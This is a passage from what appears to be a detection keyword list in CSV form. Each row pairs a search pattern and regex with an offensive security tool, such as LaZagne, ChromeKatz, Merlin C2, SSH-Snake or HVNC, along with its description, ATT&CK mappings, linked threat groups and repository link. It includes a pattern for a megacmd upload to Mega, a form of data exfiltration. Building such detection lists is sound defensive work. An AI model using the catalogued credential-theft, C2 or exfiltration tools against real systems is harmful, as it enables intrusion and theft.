- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*mdsecactivebreach/DragonCastle*",".{0,1000}mdsecactivebreach\/DragonCastle.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" 
"*mdsecactivebreach/Farmer*",".{0,1000}mdsecactivebreach\/Farmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*mdsecactivebreach/WMIPersistence*",".{0,1000}mdsecactivebreach\/WMIPersistence.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*Meckazin/ChromeKatz*",".{0,1000}Meckazin\/ChromeKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*med0x2e/GadgetToJScript*",".{0,1000}med0x2e\/GadgetToJScript.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE 
files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*media_variable_file_cryptography.py*",".{0,1000}media_variable_file_cryptography\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*megacmd -conf * put *mega:*",".{0,1000}megacmd\s\-conf\s.{0,1000}\sput\s.{0,1000}mega\:.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - 
T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*megadose/holehe*",".{0,1000}megadose\/holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*megadose@protonmail.com*",".{0,1000}megadose\@protonmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*MegaManSec/SSH-Snake*",".{0,1000}MegaManSec\/SSH\-Snake.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 
- TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*meliht/Mr.SIP*",".{0,1000}meliht\/Mr\.SIP.{0,1000}","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","383","94","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" "*melted@xmpp.jp*",".{0,1000}melted\@xmpp\.jp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Meltedd/HVNC*",".{0,1000}Meltedd\/HVNC.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Memcrashed-DDoS-Exploit*",".{0,1000}Memcrashed\-DDoS\-Exploit.{0,1000}","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1306","468","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" "*memfd implant *.elf*",".{0,1000}memfd\simplant\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*memfd task *.elf*",".{0,1000}memfd\stask\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*memory*mimipy.py*",".{0,1000}memory.{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memory/onepassword.py*",".{0,1000}memory\/onepassword\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memreader *access_token*",".{0,1000}memreader\s.{0,1000}access_token.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*MemReader_BoF.*",".{0,1000}MemReader_BoF\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*Meowmycks/etwunhook*",".{0,1000}Meowmycks\/etwunhook.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. 
Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*Meowmycks/LetMeowIn*",".{0,1000}Meowmycks\/LetMeowIn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*merlin-*.zip*",".{0,1000}merlin\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*Merlin_ServiceDesc is the grpc.ServiceDesc for Merlin service*",".{0,1000}Merlin_ServiceDesc\sis\sthe\sgrpc\.ServiceDesc\sfor\sMerlin\sservice.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-*.7z*",".{0,1000}merlinAgent\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-*.exe*",".{0,1000}merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent.exe*",".{0,1000}merlinAgent\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinAgent-Darwin-*",".{0,1000}merlinAgent\-Darwin\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a 
post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-Darwin-x64-*",".{0,1000}merlinAgent\-Darwin\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Darwin-x64.*",".{0,1000}merlinAgent\-Darwin\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-agent-dll.7z*",".{0,1000}merlin\-agent\-dll\.7z.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll/tarball/v*",".{0,1000}merlin\-agent\-dll\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll/zipball/v*",".{0,1000}merlin\-agent\-dll\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll\merlin.*",".{0,1000}merlin\-agent\-dll\\merlin\..{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlinAgent-Linux-*",".{0,1000}merlinAgent\-Linux\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-Linux-x64-*",".{0,1000}merlinAgent\-Linux\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" 
"*merlinAgent-Linux-x64.*",".{0,1000}merlinAgent\-Linux\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64-*",".{0,1000}merlinAgent\-Windows\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.*",".{0,1000}merlinAgent\-Windows\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.exe *",".{0,1000}merlinAgent\-Windows\-x64\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation 
HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinAgent-Windows-x86.exe *",".{0,1000}merlinAgent\-Windows\-x86\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*MerlinCheatSheet.pdf*",".{0,1000}MerlinCheatSheet\.pdf.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
